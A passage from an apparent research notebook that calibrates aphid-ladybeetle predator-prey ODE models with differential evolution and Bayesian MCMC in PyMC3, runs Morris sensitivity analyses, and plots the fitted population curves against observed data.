num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
rv_mpv_values_dict = dict()
progress_bar = tqdm(variable_names)
for variable in progress_bar:
progress_bar.set_description(f"Calculating MPV from KDE for {variable}")
rv_realization_values = pm_trace[f"{variable}"]
try:
num_of_dimensions = rv_realization_values.shape[1]
except IndexError:
num_of_dimensions = 0
if num_of_dimensions == 0:
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values)
rv_mpv_values_dict[f"{variable}"] = rv_mpv_value
else:
for dimension in range(num_of_dimensions):
variable_name_decomposed = f"{variable}[{dimension}]"
rv_realization_values_decomposed = np.array(rv_realization_values[:, dimension])
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values_decomposed)
rv_mpv_values_dict[f"{variable_name_decomposed}"] = rv_mpv_value
return rv_mpv_values_dict
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
new_arviz_summary = arviz_summary.copy()
variable_names = list(rv_modes_dict.keys())
rv_mode_values = list(rv_modes_dict.values())
new_arviz_summary["mpv"] = pd.Series(data=rv_mode_values, index=variable_names)
return new_arviz_summary
# In[ ]:
calibration_variable_mpv = calculate_rv_posterior_mpv(
pm_trace=trace_calibration_AP2, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_AP2.csv") # salvando em um csv para consultas
df_stats_summary
# In[ ]:
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_AP2["AP2_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_AP2["AP2_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_AP2["AP2_model"], 50, axis=0)
# In[ ]:
plt.figure(figsize=(15, 5))
plt.plot(
time_observations,
y_fit[:, 0],
"r",
label="Aphids (simulated)",
marker="X",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
time_observations,
y_fit[:, 1],
"b",
label="Ladybeetles (simulated)",
marker="o",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
time_observations,
aphid_observed.Density.values,
label="Aphids data",
marker="s",
linestyle="",
markersize=10
)
plt.plot(
time_observations,
ladybeetle_observed.Density.values,
label="Ladybeetles data",
marker="v",
linestyle="",
markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_AP2.png", dpi=300)
plt.show()
# In[ ]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict() # vamos gravar as realizações em um dicionário Python tbm
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
progress_bar.set_description(f"Gathering {variable} realizations")
parameter_realization = trace_calibration_AP2.get_values(f"{variable}")
dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_AP2.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[ ]:
df_realizations
# # Allee Prey Growth FR3 model
# ## I can't reach a sinusoidal pattern for all calibrated parameters
# In[ ]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def AP3_model(
t,
X,
r1 = 1,
r2 = 1,
r3 = 1,
a1 = 1,
a2 = 1,
a3 = 1,
):
u, v = X
u_prime = ( r1 * u - r2 * u * u ) * ( r2 * u * u - r3 * u ) - a1 * u * u * v / ( a2 + a3 * u * u )
v_prime = 0
return u_prime, v_prime
def AP3_ode_solver(
y0,
t_span,
t_eval,
r1 = 1,
r2 = 1,
r3 = 1,
a1 = 1,
a2 = 1,
a3 = 1,
):
solution_ODE = solve_ivp(
fun=AP3_model,
t_span=t_span,
y0=y0,
t_eval=t_eval,
args=(r1,r2,r3,a1,a2,a3),
method="LSODA",
)
return solution_ODE
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[ ]:
def AP3_least_squares_error_ode(
par, time_exp, f_exp, fitting_model, initial_conditions
):
args = par
f_exp1, f_exp2 = f_exp
time_span = (time_exp.min(), time_exp.max())
weighting_for_exp1_constraints = 1
weighting_for_exp2_constraints = 1
num_of_qoi = len(f_exp)
try:
y_model = fitting_model(initial_conditions, time_span, time_exp, *args)
# y_model = fitting_model(time_span, time_exp, *args)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
residual1 = f_exp1 - simulated_qoi1
residual2 = f_exp2 - simulated_qoi2
first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
objective_function = 1 / num_of_qoi * (first_term + second_term)
except ValueError:
objective_function = 1e15
return objective_function
def callback_de(xk, convergence):
"""
This function is to show the optimization procedure progress.
"""
print(f'parameters = {xk}\n')
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[ ]:
from scipy import optimize
seed = 1234
r1=0.09096034819104581
r2=1.0447969232498829e-06
r3=0.002414772393279044
a1=0.001563078527810546
a2=1.0366698235781737
a3=0.0006702488786416308
denom_min = 0.1
denom_max = 1.9
bounds_AP3 = [
( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
( ( r2 * denom_min ), ( r2 * denom_max ) ), # r2
( ( r3 * denom_min ), ( r3 * denom_max ) ), # r3
( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
( ( a2 * denom_min ), ( a2 * denom_max ) ), # a2
( ( a3 * denom_min ), ( a3 * denom_max ) ), # a3
]
result_AP3 = optimize.differential_evolution(
AP3_least_squares_error_ode,
bounds=bounds_AP3,
args=(
aphid_data.Time.values,
[aphid_data.Density.values, ladybeetle_data.Density.values],
AP3_ode_solver,
y0,
),
popsize=30,
strategy="best1bin",
tol=1e-5,
recombination=0.95,
mutation=0.6,
maxiter=20000, # 2000
polish=True,
disp=True,
seed = seed, # for the sake of reproducibility
callback=callback_de,
workers=-1,
)
print(result_AP3)
# * Retrieving the calibrated parameter values:
# In[ ]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
r1_deterministic,
r2_deterministic,
r3_deterministic,
a1_deterministic,
a2_deterministic,
a3_deterministic,
) = result_AP3.x
solution_ODE_AP3 = AP3_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*result_AP3.x
)
t_computed_AP3, y_computed_AP3 = solution_ODE_AP3.t, solution_ODE_AP3.y
u_AP3, v_AP3 = y_computed_AP3
parameters_dict = {
"Model": "AP3",
u"$r1$": r1_deterministic,
u"$r2$": r2_deterministic,
u"$r3$": r3_deterministic,
u"$a1$": a1_deterministic,
u"$a2$": a2_deterministic,
u"$a3$": a3_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "r2=" + str(r2_deterministic) + "\n" + "r3=" + str(r3_deterministic) + "\n" + "a1=" + str(a1_deterministic) + "\n" + "a2=" + str(a2_deterministic) + "\n" + "a3=" + str(a3_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[ ]:
import matplotlib.pyplot as plt
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_AP3, u_AP3, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_AP3, v_AP3, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[ ]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
r2,
r3,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$r3$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
from tqdm import tqdm
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
residual_least_squares_result = AP3_least_squares_error_ode(
parameters_realization,
aphid_data.Time.values,
[u_data, v_data],
AP3_ode_solver,
y0
)
qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[ ]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[ ]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_AP3.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[ ]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
r2,
r3,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$r3$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_AP3 = AP3_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_AP3.y
qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[ ]:
from SALib.analyze.morris import analyze as ee_analyze
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[ ]:
df_sigmai
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_AP3.png", dpi=300)
plt.show()
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_AP3.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[ ]:
def calculate_pest_time_derivative_series(
time_array,
u_array,
v_array,
ode_model,
model_pars
):
pest_time_derivative_values = list()
for t_idx, time in enumerate(time_array):
u = u_array[t_idx]
v = v_array[t_idx]
stacked_population = [u, v]
pest_time_derivative_value, _ = ode_model(time, stacked_population, *model_pars)
pest_time_derivative_values.append(pest_time_derivative_value)
pest_time_derivative_array = np.array(pest_time_derivative_values)
return pest_time_derivative_array
# In[ ]:
pest_time_derivative_array = calculate_pest_time_derivative_series(
t_computed_AP3,
u_AP3,
v_AP3,
AP3_model,
mean_values_params
)
pest_time_derivative_array
# In[ ]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_AP3, u_AP3, '-x', label='Pest population')
plt.plot(t_computed_AP3, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_AP3.png", dpi=300)
plt.show()
# In[ ]:
mean_values_params = [
r1,
r2,
r3,
a1,
a2,
a3,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$r3$",
r"$a1$",
r"$a2$",
r"$a3$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_AP3 = AP3_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_AP3.y
pest_time_derivative_array = calculate_pest_time_derivative_series(
time_range,
u_realization,
v_realization,
AP3_model,
parameters_realization
)
qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[ ]:
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[ ]:
df_sigmai
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_AP3.png", dpi=300)
plt.show()
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_AP3.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[ ]:
@theano.compile.ops.as_op(
itypes=[
t.dvector,
t.dscalar, # r1
t.dscalar, # r2
t.dscalar, # r3
t.dscalar, # a1
t.dscalar, # a2
t.dscalar, # a3
t.dscalar, # u0
t.dscalar, # v0
],
otypes=[t.dmatrix]
)
def AP3_ode_wrapper(time_exp, r1, r2, r3, a1, a2, a3, u0, v0):
time_span = (time_exp.min(), time_exp.max())
args = [r1, r2, r3, a1, a2, a3]
initial_conditions = np.array([u0, v0])
y_model = solve_ivp(
AP3_model,
time_span,
initial_conditions,
t_eval=time_exp,
method='LSODA',
args=args
)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
return concatenate_simulated_qoi
# In[ ]:
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000
start_time = time.time()
percent_calibration = 0.95
with pm.Model() as fine_model_AP3:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
r2_ = pm.Uniform(
"r2",
lower=(1.0 - percent_calibration) * r2,
upper=(1.0 + percent_calibration) * r2,
)
r3_ = pm.Uniform(
"r3",
lower=(1.0 - percent_calibration) * r3,
upper=(1.0 + percent_calibration) * r3,
)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + percent_calibration) * a1,
)
# a1_ = pm.Data("a1", a1)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
# a2_ = pm.Data("a2", a2)
# a3_ = pm.Uniform(
# "a3",
# lower=(1.0 - percent_calibration) * a3,
# upper=(1.0 + percent_calibration) * a3,
# )
a3_ = pm.Data("a3", a3)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"AP3_model",
AP3_ode_wrapper(
time_calibration,
r1_,
r2_,
r3_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
)
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
[observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
r2_ = pm.Uniform(
"r2",
lower=(1.0 - percent_calibration) * r2,
upper=(1.0 + percent_calibration) * r2,
)
r3_ = pm.Uniform(
"r3",
lower=(1.0 - percent_calibration) * r3,
upper=(1.0 + percent_calibration) * r3,
)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + percent_calibration) * a1,
)
# a1_ = pm.Data("a1", a1)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
# a2_ = pm.Data("a2", a2)
# a3_ = pm.Uniform(
# "a3",
# lower=(1.0 - percent_calibration) * a3,
# upper=(1.0 + percent_calibration) * a3,
# )
a3_ = pm.Data("a3", a3)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_1)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"AP3_model",
AP3_ode_wrapper(
time_calibration,
r1_,
r2_,
r3_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
)
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
[observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
r2_ = pm.Uniform(
"r2",
lower=(1.0 - percent_calibration) * r2,
upper=(1.0 + percent_calibration) * r2,
)
r3_ = pm.Uniform(
"r3",
lower=(1.0 - percent_calibration) * r3,
upper=(1.0 + percent_calibration) * r3,
)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + percent_calibration) * a1,
)
# a1_ = pm.Data("a1", a1)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
# a2_ = pm.Data("a2", a2)
# a3_ = pm.Uniform(
# "a3",
# lower=(1.0 - percent_calibration) * a3,
# upper=(1.0 + percent_calibration) * a3,
# )
a3_ = pm.Data("a3", a3)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_2)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"AP3_model",
AP3_ode_wrapper(
time_calibration,
r1_,
r2_,
r3_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
)
with fine_model_AP3:
step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
# step = pm.DEMetropolisZ()
trace_calibration_AP3 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[ ]:
plt.hist(trace_calibration_AP3['r2'], bins=35)
plt.show()
# In[ ]:
calibration_variable_names = [
"std_deviation",
"r2",
"r3",
"a1", # changed a3 with a1
]
# In[ ]:
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
pm.plot_posterior(
trace_calibration_AP3[::plot_step],
var_names=(f"{variable}"),
kind="hist",
round_to=4,
point_estimate="mode"
)
plt.savefig(f"img/{variable}_posterior_cal_AP3.png")
# In[ ]:
az.plot_pair(
trace_calibration_AP3,
var_names=calibration_variable_names,
kind="hexbin",
fill_last=False,
marginals=True,
figsize=(10, 8),
)
plt.savefig("img/marginals_cal_AP3.png")
# In[ ]:
df_stats_summary = az.summary(
data=trace_calibration_AP3,
var_names=calibration_variable_names,
kind='stats',
round_to=15, # arredondamento de ponto flutuante no sumário
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[ ]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
rv_mpv_values_dict = dict()
progress_bar = tqdm(variable_names)
for variable in progress_bar:
progress_bar.set_description(f"Calculating MPV from KDE for {variable}")
rv_realization_values = pm_trace[f"{variable}"]
try:
num_of_dimensions = rv_realization_values.shape[1]
except IndexError:
num_of_dimensions = 0
if num_of_dimensions == 0:
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values)
rv_mpv_values_dict[f"{variable}"] = rv_mpv_value
else:
for dimension in range(num_of_dimensions):
variable_name_decomposed = f"{variable}[{dimension}]"
rv_realization_values_decomposed = np.array(rv_realization_values[:, dimension])
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values_decomposed)
rv_mpv_values_dict[f"{variable_name_decomposed}"] = rv_mpv_value
return rv_mpv_values_dict
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
new_arviz_summary = arviz_summary.copy()
variable_names = list(rv_modes_dict.keys())
rv_mode_values = list(rv_modes_dict.values())
new_arviz_summary["mpv"] = pd.Series(data=rv_mode_values, index=variable_names)
return new_arviz_summary
# In[ ]:
calibration_variable_mpv = calculate_rv_posterior_mpv(
pm_trace=trace_calibration_AP3, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_AP3.csv") # salvando em um csv para consultas
df_stats_summary
# In[ ]:
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_AP3["AP3_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_AP3["AP3_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_AP3["AP3_model"], 50, axis=0)
# In[ ]:
plt.figure(figsize=(15, 5))
plt.plot(
time_observations,
y_fit[:, 0],
"r",
label="Aphids (simulated)",
marker="X",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
time_observations,
y_fit[:, 1],
"b",
label="Ladybeetles (simulated)",
marker="o",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
time_observations,
aphid_observed.Density.values,
label="Aphids data",
marker="s",
linestyle="",
markersize=10
)
plt.plot(
time_observations,
ladybeetle_observed.Density.values,
label="Ladybeetles data",
marker="v",
linestyle="",
markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
